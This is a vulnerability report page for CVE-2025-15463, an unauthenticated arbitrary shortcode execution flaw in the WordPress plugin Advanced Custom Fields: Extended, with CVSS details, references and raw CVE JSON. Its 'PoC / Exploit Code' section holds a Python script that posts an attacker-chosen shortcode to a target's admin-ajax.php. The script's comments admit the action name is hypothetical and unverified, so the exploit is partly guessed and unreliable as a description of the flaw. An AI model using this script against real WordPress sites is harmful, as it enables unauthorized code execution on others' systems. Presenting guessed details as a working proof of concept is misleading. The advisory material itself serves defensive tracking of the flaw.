Security Vulnerability Report
CVE-2025-15463 CVSS 6.5 MEDIUM

CVE-2025-15463

Published: 2026-05-12 23:16:16
Last Modified: 2026-05-13 15:26:44

Description

The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.9.2.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Advanced Custom Fields: Extended <= 0.9.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit for CVE-2025-15463
# Target: WordPress with Advanced Custom Fields: Extended <= 0.9.2.3
# Description: Unauthenticated arbitrary shortcode execution

target = "http://example.com"

# The vulnerable endpoint is typically an AJAX action or a specific form handler.
# Based on the module 'module-form-front-render.php', the action might be related to ACF rendering.
url = f"{target}/wp-admin/admin-ajax.php"

# Payload containing a malicious shortcode.
# Using a standard shortcode like [gallery] to verify execution, or a custom one for exploitation.
payload_data = {
    "action": "acf_frontend/render",  # Hypothetical action name, actual action needs verification
    "acf_extended[field]": "[your_malicious_shortcode]",
}

try:
    # Timeout added so the request cannot hang indefinitely
    response = requests.post(url, data=payload_data, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

- https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/modules/form/module-form-action-email.php#L111
- https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/modules/form/module-form-front-render.php#L35
- https://www.wordfence.com/threat-intel/vulnerabilities/id/f8544784-1994-47e2-be39-568d0ab9ee00?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-15463",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T23:16:15.883",
    "lastModified": "2026-05-13T15:26:44.333",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.9.2.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/modules/form/module-form-action-email.php#L111",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/modules/form/module-form-front-render.php#L35",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f8544784-1994-47e2-be39-568d0ab9ee00?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}